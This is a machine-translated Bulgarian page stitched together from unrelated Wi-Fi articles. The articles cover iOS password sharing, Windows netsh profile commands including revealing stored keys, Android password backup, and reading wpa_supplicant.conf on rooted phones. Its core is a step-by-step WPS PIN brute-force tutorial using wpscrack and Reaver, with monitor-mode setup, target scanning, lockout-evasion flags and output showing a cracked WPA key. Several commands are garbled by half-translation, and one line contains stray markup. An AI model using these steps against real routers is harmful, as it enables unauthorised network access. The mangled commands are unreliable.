Прехвърлете запазените пароли за wifi на нов смартфон. Получаване на WPA ключ за Wi-Fi с помощта на уязвима WPS технология

За да се свържете с Wi-Fi мрежив кафене или в къщата на приятел обикновено трябва да поискаме парола и да я въведем на устройството си. Всичко това, разбира се, не е много удобно и отнема много време. Освен това се случва хората просто да не помнят паролата за своя Wi-Fi.
За щастие, с появата на iOS 11 всички тези трудности вече не са актуални - благодарение на новия Функции на Appleнаречен „Споделете своя Wi-Fi“. Вече можете да се свържете с Wi-Fi на някой друг само с едно докосване на екрана на друго устройство, което вече е свързано към мрежата.
Страхотно, нали? Вече няма нужда да помните и да въвеждате дълго и сложни пароли. Няма нужда да се притеснявате, че някой знае паролата ви сега. Не са необходими QR кодове. И всичко, което е необходимо, е взаимодействащите устройства да имат операционна система iOS 11 или macOS High Sierra.

От какво имаш нужда

Този метод работи на iPad, iPhone, iPod touch и Mac с iOS версия 11 и по-нова или macOS версия High Sierra и по-нова. Също така се уверете, че Wi-Fi и Bluetooth са включени и на двете устройства.
В нашия пример ще използваме два iPhone.

Стъпка 1: Изберете Wi-Fi мрежа

Отворете на iPhone, който ще свържете към интернет, Wi-Fi настройкии изберете мрежата, към която искате да се свържете - тоест същата мрежа, използвана от другия iPhone. След като изберете мрежата, на екрана ще се появи полето „Въведете парола“.

Стъпка 2: Отключете вашето вече свързано Wi-Fi устройство

Стъпка 3: Приближете устройствата си едно до друго

Ако нищо не се е случило досега, преместете устройствата по-близо едно до друго - в този случай iPhone, който не е свързан към Wi-Fi, ще може да изпрати заявка до свързания.

Стъпка 4: Изпратете вашата парола

След кратка пауза полето за парола на несвързания iPhone ще бъде автоматично попълнено и устройството веднага ще бъде свързано към Wi-Fi мрежата. Сега всичко, което трябва да направите, е да кликнете върху бутона „Готово“.

Това е всичко! Разбира се, ако нямате доверие на лицето, което иска паролата ви за Wi-Fi, трябва да отхвърлите искането му. В края на краищата, въпреки че той няма да може да види паролата на устройството си, по-късно, ако паролата е запазена в приложението Keychain, тя може да се види на Mac. Освен това този метод може да не е подходящ за някои корпоративни местоположения. Wi-Fi достъп, където RADIUS сървър се използва за оторизация.

Отказ от отговорност: Тази статия е написана само с образователна цел. Авторът или издателят не са публикували тази статия със злонамерени цели. Ако читателите желаят да използват информацията за лична изгода, авторът и издателят не носят отговорност за причинени вреди или щети.

В Windows 8 (както в предишния Windows версии) при успешно свързване към безжична Wi-Fi мрежа, системата автоматично създава на тази връзкаотделно Профил на Wi-Fi мрежа. Този профил съдържа цялата информация, необходима за установяване на безжична връзка: име на мрежата (SSID), метод за удостоверяване, мрежова парола (ключ за парола) и друга информация. В бъдеще, ако тази Wi-Fi мрежа е в обхвата на видимост, този профил се използва за автоматично свързване с нея.

В Windows 7 имаше специален елемент от контролния панел, който ви позволяваше да управлявате профили на безжична мрежа ( Управление на безжична мрежа): изтриване на профили, промяна на техните параметри или приоритет. В Windows 8 Microsoft по някаква причина реши да премахне тази функционалност, така че в Windows 8 можете да управлявате Wi-Fi мрежови профили с помощта на помощни програми на трети страни (това не са нашите методи!) или с командна линия.

И така, безжичните мрежи в Windows 8 могат да се управляват с помощта на командния ред, командата ще ни помогне с това netsh.

Как да покажа списък със запазени Wi-Fi профили

Списък с профили на безжична мрежа може да се покаже с помощта на командата:

Netsh wlan показва профили

Командата връща списък със запазени профили безжичен Wi-Fiмрежи. В този пример има един профил на Wi-Fi мрежа на име michael.

Преглед на запазени пароли за Wi-Fi мрежи в Windows 8

Не е тайна, че за удобство на потребителя системата съхранява мрежовия ключ (парола за мрежови връзки).

Можете да видите запазената парола за достъп до Wi-Fi мрежа (WPA, WEP и т.н.) директно от командния ред с помощта на командата netsh, като посочите желания профил:

Netsh wlan показва профили name= michael key=clear

Паролата (ключ) на Wi-Fi мрежата може да се види в Настройки за защита -> раздел Ключово съдържание. В този случай паролата за свързване към Wi-Fi точкадостъп: testwifikey.

Премахване на профил за Wi-FI връзка в Windows 8

Можете да изтриете записан профил на безжична връзка в Windows 8 с командата:

Netsh wlan изтриване на профил name=

Тази команда ще унищожи всички запазени профили за всички WLAN интерфейси.
Ако трябва да изтриете профил на Wi-Fi мрежа за конкретен WLAN интерфейс, използвайте следната команда:

Netsh wlan изтриване на профил name= интерфейс=

Забележка. Профилите на безжичната мрежа в Windows 8 се съхраняват като XML файлове в директорията C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\(Interface_GUID)\(Profile_GUID).xml
За всеки Wi-Fi адаптерсъответства на собствения GUID на интерфейса (GUID_interface) и всички запазени профили за този интерфейс се съхраняват в xml файл с (GUID_Profile) като име. За да изтриете информация за конкретен безжичен профил, просто изтрийте съответния xml файл.

Как да се свържете към безжична мрежа в Windows 8 чрез командния ред

Можете да се свържете към безжична мрежа чрез командния ред в Windows 8, ако системата вече има необходимия профил. За да се свържете, използвайте командата:

Netsh wlan свързване име=

Ако трябва да се свържете от командния ред към мрежа, записана в профил (как да получите списък с всички профили в системата е описано по-горе) с име wlrЗ1З$$, изпълнете следната команда:

Netsh wlan свързване name="wlrЗ1З$"

Също така е възможно да посочите конкретния интерфейс, през който искате да инсталирате Wi-Fi връзка. В този случай командата ще изглежда така:

Netsh wlan connectmso-ansi-language:EN-US" lang="EN-US">1З$" интерфейс="Безжична мрежова връзка 2"

Прекъсване на връзката с WiFi мрежа

За да прекъснете връзката с безжичната мрежа, използвайте командата:

netsh wlan прекъсване на връзката

Или посочете конкретен интерфейс:

Netsh wlan disconnect interface="Безжична мрежова връзка 2"

Как да промените приоритета на безжичните мрежи в Windows 8

Ако има няколко Wi‑Fi мрежи в зоната на покритие, приоритет безжични връзкисе определя по следния начин: последната връзка става най-висок приоритет, ако елементът „автоматично свързване“ е активен. Ако тази мрежа не е налична, Windows 8 се опитва да се свърже с Wi-Fi мрежата, която е била приоритетна последния път и ако връзката е успешна, приоритетът на тази мрежа се увеличава.

Забележка. В Windows 8, ако има множество мрежови връзки, по подразбиране системата се опитва да се свърже първо през Ethernet, ако това не е възможно, тя се опитва да установи Wi-Fi връзка и ако и двете опции не са налични, Windows 8 ще се свърже с мобилната мрежа.

Текущият приоритет за безжичните мрежи може да се покаже с помощта на вече познатата команда:

Netsh wlan показва профили

Колкото по-висок е профилът в списъка, толкова по-висок е приоритетът на тази връзка. За да промените приоритета на една от Wi-Fi мрежите, използвайте командата:

Netsh wlan set profileorder name=”wlrЗ1З$" интерфейс="Безжична мрежова връзка 2” priority=1

Тази команда увеличава приоритета на безжичната мрежа wlrЗ1З$$ за интерфейса Wireless Network Connection 2 до максимум (1).

И ако отново изведете списък с всички мрежови профили, ще видите, че приоритетът на мрежата wlrЗ1З$$ е увеличен (тя е най-високата в списъка).

Прехвърляне на Wi-Fi мрежови профили между компютри с Windows 8

За да прехвърлите съществуващ Wi-Fi профил от един компютър на друг, трябва да го експортирате в XML файл и след това да го изтеглите на другия компютър.

И отново на помощ ни идва помощната програма netsh, която ви позволява да експортирате и импортирате настройки (профили) на безжична мрежа в XML файл:

Нека качим настройките на Wi-Fi профила:

Име на профил за експортиране на Netsh wlan =” wlrЗ1З$” folder=c:\wifi

В резултат на това в директорията c:\wifi трябва да се появи xml файл, който трябва да се копира на друг компютър и да се импортира с командата:

Netsh wlan add profile filename=”c:\wifi\WiFi_profile_name.xml”

С помощта на тези команди можете също да архивирате всички Wi-Fi профили на вашия компютър.

Ограничаване на достъпа до Wi-Fi мрежи

Можете да ограничите достъпа до Wi-Fi мрежи с помощта на група Правила на Windows. Пример за прилагане на такова ограничение е описан в статията: и.

Не толкова отдавна изглеждаше, че безжичната мрежа, защитена с технологията WPA2, е доста сигурна. Намирането на прост ключ за свързване е наистина възможно. Но ако инсталирате наистина дълъг ключ, нито дъговите таблици, нито дори GPU ускорението ще ви помогнат да го поправите. Но, както се оказа, можете да се свържете с безжична мрежа и без това - като се възползвате от наскоро открита уязвимост в протокола WPS.

ВНИМАНИЕ

Цялата информация е представена само за образователни цели. Проникването в чужда безжична мрежа може лесно да се счита за криминално престъпление. Мислете с главата си.

Цената на опростяванията

Има все по-малко отворени точки за достъп, към които изобщо не е необходимо да въвеждате ключ, за да се свържете. Изглежда, че скоро те могат да бъдат включени в Червената книга. Ако преди човек може дори да не знае, че безжичната мрежа може да бъде заключена с ключ, предпазвайки се от външни връзки, сега все повече му се казва за тази възможност. Вземете например персонализирания фърмуер, който водещите доставчици пускат за популярни модели рутери, за да опростят настройката. Трябва да посочите две неща - логин/парола и... ключ за защита на безжичната мрежа. По-важното е, че самите производители на хардуер се опитват да направят процеса на настройка лесен. По този начин повечето съвременни рутери поддържат механизма WPS (Wi-Fi Protected Setup). С негова помощ потребителят може да създаде защитена безжична мрежа за секунди, без изобщо да се занимава с факта, че „трябва да активирате криптиране някъде другаде и да регистрирате WPA ключ“. Въведох осемцифрения символичен ПИН в системата, който е изписан на рутера и сте готови! И тук, дръжте се здраво. През декември двама изследователи говориха за сериозни фундаментални недостатъци в протокола WPS. Това е като задна врата за всеки рутер. Оказа се, че ако WPS е активиран в точката за достъп (която за момент е активирана в повечето рутери по подразбиране), тогава можете да изберете PIN за връзка и да извлечете ключа за връзка за броени часове!

Как работи WPS?

Идеята на създателите на WPS е добра. Механизмът автоматично задава името на мрежата и криптирането. По този начин потребителят не трябва да влиза в уеб интерфейса и да се занимава със сложни настройки. И можете лесно да добавите всяко устройство (например лаптоп) към вече конфигурирана мрежа: ако въведете правилно ПИН кода, то ще получи всички необходими настройки. Това е много удобно, поради което всички големи играчи на пазара (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) вече предлагат безжични рутерис поддръжка на WPS. Нека го разгледаме малко по-подробно.

Има три опции за използване на WPS:

  1. Свързване с бутон (PBC). Потребителски щраквания специален бутонна рутера (хардуер) и на компютъра (софтуер), като по този начин активирате процеса на настройка. Ние не се интересуваме от това.
  2. Въвеждане на ПИН код в уеб интерфейса. Потребителят влиза в административния интерфейс на рутера през браузър и въвежда осемцифрения ПИН код, изписан на тялото на устройството (Фигура 1), след което се извършва процесът на настройка. Този метод е по-подходящ за първоначалната конфигурация на рутера, така че няма да го разгледаме.
  3. Въвеждане на ПИН кода на компютъра на потребителя (Фигура 2). Когато се свързвате с рутер, можете да отворите специална WPS сесия, в рамките на която можете да конфигурирате рутера или да получите съществуващи настройки, ако въведете правилно ПИН кода. Това вече е привлекателно. Не се изисква удостоверяване за отваряне на такава сесия. Всеки може да направи това! Оказва се, че ПИН кодът вече е потенциално податлив на брутфорс атака. Но това са само цветя.

Уязвимост

Както отбелязах по-рано, ПИН кодът се състои от осем цифри - следователно има 10^8 (100 000 000) опции за съпоставяне. Въпреки това, броят на опциите може да бъде значително намален. Факт е, че последната цифра на ПИН кода представлява определен контролна сума, което се изчислява въз основа на първите седем цифри. В резултат на това вече получаваме 10^7 (10 000 000) опции. Но това не е всичко! След това внимателно разглеждаме устройството на WPS протокола за удостоверяване (Фигура 3). Има чувството, че е специално проектирано да остави място за груба сила. Оказва се, че проверката на ПИН кода се извършва на два етапа. Разделя се на две равни части, като всяка част се проверява отделно! Да погледнем диаграмата:

  1. Ако след изпращане на съобщението M4 атакуващият получи в отговор EAP-NACK, тогава той може да бъде сигурен, че първата част от ПИН кода е неправилна.
  2. Ако е получил EAP-NACK след изпращане на M6, тогава втората част от ПИН кода е неправилна. Получаваме 10^4 (10 000) опции за първата половина и 10^3 (1000) за втората. В резултат на това имаме само 11 000 опции за пълно търсене. За да разберете по-добре как ще работи това, погледнете диаграмата.
  3. Важен момент е възможната скорост на търсене. Тя е ограничена от скоростта, с която рутерът обработва WPS заявки: някои точки за достъп ще дават резултати всяка секунда, други на всеки десет секунди. По-голямата част от времето се изразходва за изчисления публичен ключспоред алгоритъма на Diffie-Hellman, той трябва да бъде генериран преди стъпка M3. Времето, изразходвано за това, може да бъде намалено чрез избор на прост таен ключ от страна на клиента, което ще опрости изчисленията на други ключове в бъдеще. Практиката показва, че за успешен резултат обикновено е достатъчно да преминете през само половината от всички опции, а средно грубата сила отнема само четири до десет часа.

Първо изпълнение

Първото появяващо се прилагане на груба сила беше помощната програма wpscrack (goo.gl/9wABj), написана от изследователя Стефан Вибьок на Език Python. Помощната програма използва библиотеката Scapy, която ви позволява да инжектирате произволно мрежови пакети. Скриптът може да се изпълнява само под Linux система след първи превод безжичен интерфейсв режим на наблюдение. Като параметри трябва да посочите името на мрежовия интерфейс в системата, MAC адреса на безжичния адаптер, както и MAC адреса на точката за достъп и нейното име (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer започна да опитва 00000000 опита отне 0,95 секунди опит 00010009<...>опитът 18660005 отне 1,08 секунди опитът 18670004# намерен 1-вата половина на опита за ПИН отне 1,09 секунди опитът 18670011 отне 1,08 секунди<...>при опит 18674095# е намерена 2-ра половина на PIN<...>Мрежов ключ: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_passphras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Както можете да видите, първо беше избрана първата половина на ПИН кода, след това втората и накрая програмата изработи готов за използване ключ за свързване към безжичната мрежа. Трудно е да си представим колко време би отнело намирането на ключ с тази дължина (61 знака) с вече съществуващи инструменти. Wpscrack обаче не е единствената помощна програма за използване на уязвимостта и това е доста забавен момент: по същото време друг изследовател, Крейг Хефнър от Tactical Network Solutions, работеше по същия проблем. Виждайки, че работещ PoC за осъществяване на атака се появява в интернет, той публикува своята помощна програма Reaver. Той не само автоматизира процеса на избор на WPS-PIN и извличане на PSK ключа, но също така предлага по-голям брой настройки, така че атаката да може да се извърши срещу голямо разнообразие от рутери. Освен това поддържа много по-голям брой безжични адаптери. Решихме да го вземем за основа и да опишем подробно как атакуващият може да използва уязвимост в протокола WPS, за да се свърже към защитена безжична мрежа.

КАК ДА

Както при всяка друга атака срещу безжична мрежа, ще ни трябва Linux. Тук трябва да се каже, че Reaver присъства в хранилището на добре познатата дистрибуция BackTrack, която също вече включва необходимите драйвери за безжични устройства. Затова ще го използваме точно.

Стъпка 0. Подгответе системата

На официалния уебсайт BackTrack 5 R1 е достъпен за изтегляне като виртуална машинапод VMware и изображение за зареждане ISO. Препоръчвам последния вариант. Можете просто да напишете изображението върху празен лист или да използвате програмата, за да го направите стартиращо USB флаш устройство: по един или друг начин, след като стартираме от такъв носител, веднага ще имаме система, готова за работа, без никакви ненужни проблеми.

Интензивен курс за хакване на Wi-Fi

  1. WEP (Wired Equivalent Privacy) Още първата технология за защита на безжична мрежа се оказа изключително слаба. Можете да го хакнете буквално за няколко минути, като използвате слабостите на използвания в него RC4 шифър. Основните инструменти тук са airodump-ng sniffer за събиране на пакети и aircrack-ng помощната програма, използвана директно за кракване на ключа. Има и специален инструмент wesside-ng, който обикновено хаква автоматично всички близки WEP точки.
  2. WPA/WPA2 (безжичен защитен достъп)

Грубата сила е единственият начин да се намери ключ за затворена WPA/WPA2 мрежа (и дори тогава само ако има дъмп на така нареченото WPA Handshake, което се излъчва, когато клиент се свърже с точка за достъп).

Грубата сила може да се проточи с дни, месеци и години. За да се повиши ефективността на търсенето, първо бяха използвани специализирани речници, след това бяха генерирани дъгови таблици, а по-късно се появиха помощни програми, които използват технологиите NVIDIA CUDA и ATI Stream за хардуерно ускоряване на процеса с помощта на GPU. Използваните инструменти са aircrack-ng (груба сила, използваща речник), cowpatty (използваща дъгови таблици), pyrit (използваща видеокарта).

Стъпка 1: Влезте

По подразбиране потребителското име и паролата са root:toor. След като влезете в конзолата, можете безопасно да стартирате „X“ (има отделни сглобки BackTrack - както с GNOME, така и с KDE):

#startx

Стъпка 2: Инсталирайте Reaver

За да изтеглим Reaver, ще ни трябва интернет. Затова свързваме кабела за свързване или конфигурираме безжичния адаптер (меню „Приложения> Интернет> Wicd Network Manager“). След това стартираме терминалния емулатор, където зареждаме последна версияпомощни програми чрез хранилището:

# apt-get актуализация # apt-get install reaver

Тук трябва да кажа, че хранилището съдържа версия 1.3, която лично при мен не работи коректно. След като потърсих информация за проблема, намерих публикация от автора, който препоръчва актуализиране до възможно най-високата версия чрез компилиране на източници, взети от SVN. Като цяло това е най-универсалният метод за инсталиране (за всяка дистрибуция).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Няма да има проблеми с монтажа под BackTrack - проверих го лично. В дистрибуцията на Arch Linux, която използвам, инсталирането е още по-просто, благодарение на наличието на съответния PKGBUILD:

$ yaourt -S reaver-wps-svn

Стъпка 3. Подготовка за груба сила

За да използвате Reaver, трябва да направите следното:

  • превключете безжичния адаптер в режим на наблюдение;
  • разберете името на безжичния интерфейс;
  • разберете MAC адреса на точката за достъп (BSSID);
  • уверете се, че WPS е активиран на точката.

Първо, нека проверим дали безжичният интерфейс изобщо присъства в системата:

#iwconfig

Ако изходът на тази команда съдържа интерфейс с описание (обикновено wlan0), това означава, че системата е разпознала адаптера (ако се е свързал към безжичната мрежа, за да зареди Reaver, тогава е по-добре да прекъснете връзката). Нека поставим адаптера в режим на наблюдение:

# airmon-ng стартирайте wlan0

Тази команда създава виртуален интерфейс в режим на наблюдение, името му ще бъде посочено в изхода на командата (обикновено mon0). Сега трябва да намерим точката за достъп за атака и да разберем нейния BSSID. Нека използваме помощната програма за слушане на безжични предавания airodump-ng:

#airodump-ngmon0

На екрана ще се появи списък с точки за достъп в обхвата. Интересуваме се от точки с WPA/WPA2 криптиране и удостоверяване с PSK ключ.

По-добре е да изберете един от първите в списъка, тъй като е желателно да извършите атака добра връзкас точка. Ако има много точки и списъкът не се побира на екрана, тогава можете да използвате друга добре позната помощна програма - kismet, където интерфейсът е по-подходящ в това отношение. По желание можете да проверите на място дали WPS механизмът е активиран в нашия пункт. За да направите това, Reaver идва в комплект с (но само ако го вземете от SVN) помощната програма за измиване:

# ./wash -i mon0

Параметърът е името на интерфейса, превключен в режим на наблюдение. Можете също така да използвате опцията '-f' и да подадете на помощната програма cap файл, създаден например от същия airodump-ng. По някаква неизвестна причина пакетът Reaver в BackTrack не включва помощната програма за измиване. Да се ​​надяваме, че тази грешка ще бъде коригирана до момента на публикуване на тази статия.

Стъпка 4. Пуснете груба сила

Сега можете да продължите директно към търсенето на ПИН. За да стартирате Reaver в най-простия случай не ви трябва много. Просто трябва да посочите името на интерфейса (който преди това превключихме в режим на наблюдение) и BSSID на точката за достъп:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

Превключвателят „-vv“ позволява подобрен програмен изход, за да можем да се уверим, че всичко работи според очакванията.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Крейг Хефнър [+] Изчакване на маяк от 00:21:29:74:67:50 [+] Свързано с 00:21:29:74:67:50 (ESSID: linksys) [+] Опит за пин 63979978

Ако програмата постоянно изпраща ПИН до точката за достъп, това означава, че всичко е започнало добре и остава само да чакате глупаво. Процесът може да отнеме много време. Повечето кратко времеОтне ми около пет часа, за да форсирам моя ПИН. Веднага след като бъде избрана, програмата с радост ще ви информира за това:

[+] Опитващ пин 64637129 [+] Ключът е кракнат за 13654 секунди [+] WPS ПИН: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Най-ценното тук е, разбира се, ключът WPA-PSK, който можете веднага да използвате за свързване. Всичко е толкова просто, че дори не се побира в главата ви.

Възможно ли е да се защитите?

Засега има само един начин да се предпазите от атака - деактивирайте WPS в настройките на рутера. Както се оказа обаче, това не винаги е възможно. Тъй като уязвимостта съществува не на ниво внедряване, а на ниво протокол, не трябва да очаквате бърза корекция от производителите, която ще реши всички проблеми. Най-много, което могат да направят сега, е да се противопоставят на грубата сила, доколкото е възможно. Например, ако блокирате WPS за един час след пет неуспешни опита за въвеждане на ПИН кода, тогава търсенето ще отнеме около 90 дни. Но друг въпрос е колко бързо може да бъде въведена такава корекция на милиони устройства, работещи по целия свят?

Надграждане на Reaver

В HOWTO показахме най-простия и най-гъвкав начин за използване на помощната програма Reaver. Внедряването на WPS обаче варира от производител до производител, така че в някои случаи е необходимо допълнителна персонализация. По-долу ще предоставя допълнителни опции, които могат да увеличат скоростта и ефективността на търсенето на ключове.

  1. Можете да зададете номера на канала и SSID на точката за достъп: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Опцията „—dh-small“ има благоприятен ефект върху скоростта на груба сила, тъй като задава малка стойност за секретния ключ, като по този начин улеснява изчисленията от страна на точката за достъп: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-малък
  3. Времето за изчакване на отговора по подразбиране е пет секунди. Ако е необходимо, можете да го промените: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Закъснението по подразбиране между опитите е една секунда. Може също да се конфигурира: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Някои точки за достъп може да блокират WPS за определено време, подозирайки, че са измамени. Reaver забелязва тази ситуация и спира търсенето за 315 секунди по подразбиране, продължителността на тази пауза може да бъде променена: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Някои реализации на протокола WPS ще прекъснат връзката, ако PIN кодът е неправилен, въпреки че според спецификацията трябва да върнат специално съобщение. Reaver автоматично разпознава тази ситуация, за това има опция „—nack“: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Опцията „--eap-terminate“ е предназначена да работи с тези AP, които изискват прекратяване на WPS сесията с помощта на съобщението EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -прекратяване
  8. Възникването на грешки в WPS сесията може да означава, че AP ограничава броя на опитите за въвеждане на PIN код или просто е претоварен със заявки. Информация за това ще се покаже на екрана. В този случай Reaver поставя на пауза дейността си и времето за пауза може да бъде зададено с помощта на опцията '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

ЧЗВ

Въпрос: Какъв безжичен адаптер е необходим за хакване?

Отговор: Преди да експериментирате, трябва да се уверите, че безжичният адаптер може да работи в режим на наблюдение. По най-добрия начин- проверете списъка с поддържано оборудване на уебсайта на проекта Aircrack-ng. Ако възникне въпросът кой безжичен модул да закупите, тогава можете да започнете с всеки адаптер, базиран на чипсета RTL8187L. USB донгъли могат лесно да бъдат намерени в интернет за $20.

Въпрос: Защо получавам грешки "време за изчакване" и "извън ред"?

Отговор: Това обикновено се случва поради ниска сила на сигнала и лоша връзкас точка за достъп. Освен това точката за достъп може временно да блокира използването на WPS.

Въпрос: Защо подправянето на MAC адреси не работи за мен?

Отговор: Възможно е да подправите MAC на виртуалния интерфейс mon0 и това да не работи. Трябва да посочите името на реалния интерфейс, например wlan0.

Въпрос: Защо Reaver работи зле, когато сигналът е лош, въпреки че същото WEP хакване работи добре?

Отговор: WEP кракването обикновено се случва чрез повторно предаване на уловени пакети, за да се получат повече инициализиращи вектори (IV), необходими за успешно кракване. В този случай няма значение дали някой пакет е бил изгубен или по някакъв начин повреден по пътя. Но за да атакувате WPS, трябва стриктно да следвате протокола за прехвърляне на пакети между точката за достъп и Reaver, за да проверите всеки ПИН код. И ако в същото време някакъв пакет се загуби или пристигне в неприлична форма, тогава ще трябва да възстановите WPS сесията. Това прави атаките срещу WPS много по-зависими от силата на сигнала. Също така е важно да запомните, че само защото вашият безжичен адаптер вижда точка за достъп, това не означава, че точката за достъп вижда вас. Така че, ако сте щастлив собственик на адаптер с висока мощност от ALFA Network и антена от няколко десетки dBi, тогава не очаквайте да успеете да разбиете всички уловени точки за достъп.

Въпрос: Reaver винаги изпраща един и същ PIN към точката за достъп, какво има?

Отговор: Проверете дали WPS е активиран на рутера. Това може да стане с помощта на помощната програма за измиване: стартирайте я и проверете дали вашата цел е в списъка.

Въпрос: Защо не мога да се свържа с точка за достъп?

Отговор: Това може да се дължи на слаба сила на сигнала или защото вашият адаптер не е подходящ за такова изследване.

Въпрос: Защо продължавам да получавам грешки „открито е ограничаване на скоростта“?Отговор: Това е така, защото точката за достъп е блокирала WPS. Обикновено това е временно блокиране (около пет минути), но в някои случаи могат да наложат постоянен бан (деблокиране само през административния панел). Има една неприятна грешка в Reaver версия 1.3, поради която премахването на такива ключалки не се открива. Като заобиколно решение те предлагат да използвате опцията „—ignore-locks“ или да изтеглите най-новата версия от SVN.

Въпрос: Мога ли да стартирам две или повече копия на Reaver едновременно, за да ускоря атаката си?

Отговор: Теоретично е възможно, но ако атакуват една и съща точка за достъп, скоростта на търсене едва ли ще се увеличи, тъй като в този случай тя е ограничена от слабия хардуер на точката за достъп, която вече е напълно заредена дори и с един нападател .

С развитието на Интернет WIFI е достъпен по целия свят. Така WIFI почти се превръща в неделима част от живота ни за много хора. Използваме го, за да сърфираме в интернет, да гледаме видеоклипове и да проверяваме Twitter и Facebook и много други. Използваме го и за Резервно копиенашите лични данни на Android устройство към интернет. Защото, ако използваме 4G/3G/2G за архивиране на данни и размерът на тези данни е твърде голям, може да се наложи да платим много пари и да отделим твърде много време. Понякога може да забравите паролите си за Wi-Fi, така че трябва да поддържаме пароли за Android WiFi на безопасно място, за да ви попречи да използвате WIFI. Тук ще представим няколко прости начиниархивирайте вашите WIFI пароли и Данни за Androidчрез Wi-Fi.

Част 1. Два начина за архивиране на настройките на Android WIFI

Метод 1. Ръчно управление за архивиране на WIFI Google пароли

Тук ще ви покажем как да архивирате паролата си за WIFI към услугата, която Google предоставя. Следвайте стъпките, които показваме, и се опитайте да го направите сами.

етап 1. Отворете настройките на устройството си с Android. намирам Google акаунти влезте.

стъпка 2. Ще видите опция за архивиране и нулиране и можете да архивирате данните на приложението, настройките и паролите за WIFI към сървърите на Google.

Но ще откриете, че не всички Android устройствомога да го направя. Така че трябва да се свържете с някои Android приложенияза помощ. Освен това ви предоставяме няколко приложения, които да ви помогнат да направите това.

Метод 2. Две приложения за вас, за да архивирате паролите си за WIFI на Android

1.Възстановяване и архивиране на WIFI Pass

WIFI Pass Recovery & Backup показва WIFI името и паролата и ги подрежда по първата буква. Може също така да създаде файл, съдържащ паролата за WIFI, и да го запише на SD картата. Когато трябва да намерите паролата обратно, можете просто да щракнете и да възстановите WIFI данните. Освен това можете също да копирате паролата и да я поставите в друг файл. Ако имате нужда от повече информация, моля, щракнете върху връзката, която предоставяме по-долу.

2. Архивирайте мобилния си телефон

Това е напълно безплатно приложение "всичко в едно" на платформата Android. Може да архивира вашите данни, включително контакти, настройки, APNS, WIFI парола, календари, потребителски приложения, съобщения, история на браузъра, отметки и т.н. Тези данни, които е архивирал, ще бъдат съхранени във вашата SD карта или телефон с памет. Но за да архивирате вашите Wi-Fi пароли, трябва да руутнете вашето Android устройство.

Намерете своя Архивирайте мобилния си телефон V Google Play
HTTPS://play.google.com/store/apps/details?ID = com.backupyourmobile

Част 2. Как да архивирате всички данни на Android с помощта на Wi-Fi

След като бъде въведено, как да архивирате паролите за Wi-Fi към Android телефонили таблет, смятаме, че знаете как. И можете да се насладите на щастието, което WIFI ви носи свободно. Сега ще ви кажем как да архивирате Android през Wi-Fi.

Силно ви препоръчваме страхотен помощник - MobileGo за Android. Освен това е приложение "всичко в едно". Той може да архивира вашите данни, включително контакти, музика, съобщения, снимки, календари, регистър на обажданията, приложения, видеоклипове и данни от приложения с едно щракване. Ако искаш, архивни файловеможе лесно да се възстанови.

Следвайте нашите стъпки и ние ще ви покажем как да го използвате:

  • 1. Изтеглете MobileGo за Android и инсталирайте на вашия компютър, изтеглете APK файли инсталирайте на вашите Android устройства.
  • 2. Намерете опцията WIFI в настройките на вашето Android устройство и я включете. Отворете приложението MobileGo на телефона си.
  • 3. Трябва да използвате функцията за сканиране на QR код, за да свържете компютъра. Това, което трябва да направите, е да го натиснете и да сканирате дисплея с QR код на вашия компютър.
  • 4. След сканиране на QR кода, вашето Android устройство ще бъде свързано към вашия компютър.
  • 5. Щракнете върху бутона Backup с едно щракване, който се появява в прозорците на работещия компютър.
  • 6. Това е изскачащ прозорец, за да ви покаже данните, които можете да архивирате на вашето Android устройство. Маркирайте, че искате да създадете резервно копие и щракнете върху опцията Архивиране.
  • 7. Просто изчакайте процеса на архивиране да приключи. Файл резервно копиеще бъдат запазени на вашия компютър.

Съвет:Ако това е първият път, когато свързвате устройството си с Android към компютъра чрез USB кабел, вашето Android устройство автоматично ще инсталира MobileGo APK файла.

В тази статия ще научите как да видите паролата за Wi-Fi мрежата, към която е свързан вашият телефон/таблет с Android. Бихме искали веднага да ви предупредим, че ако не го инсталирате на устройството си с Android, няма да можете да разберете паролата за Wi-Fi, с изключение на тесен кръг устройства, за които можете да приложите метода 3 (виж по-долу). Ако не знаете дали ROOT е инсталиран на вашия телефон/таблет, вижте метод 2.

Метод 1 (необходим е ROOT)

Повечето бърз начинразберете паролата за Wi-Fi на руутнато устройство с Android - инсталирайте специално приложениеот Google Магазин за игри, например WiFi Key Recovery.

Приложението показва списък на всички Wi-Fi мрежи, към които телефонът/таблетът някога се е свързвал. Редът "psk" показва паролата за всяка мрежа. Ако щракнете върху мрежа, ще се появи контекстно меню, където можете да копирате паролата (Копиране на парола), цялата информация за мрежата (Копиране на всички) или генериране на QR код (Показване на QR код), за да сканирате с друг телефон/таблет към свържете се с Wi-Fi.

Метод 2 (изисква се ROOT)

Принципът на работа на приложенията за преглед на Wi-Fi пароли се свежда до анализиране на конфигурационния файл "/data/misc/wifi/wpa_supplicant.conf" в Android система. Следователно, вместо да ги използвате, можете директно да видите този файл. За достъп до системните файлове, от които се нуждаете файлов мениджърс ROOT достъп и вграден текстов редактор. ES Explorer е доста подходящ за тази цел.

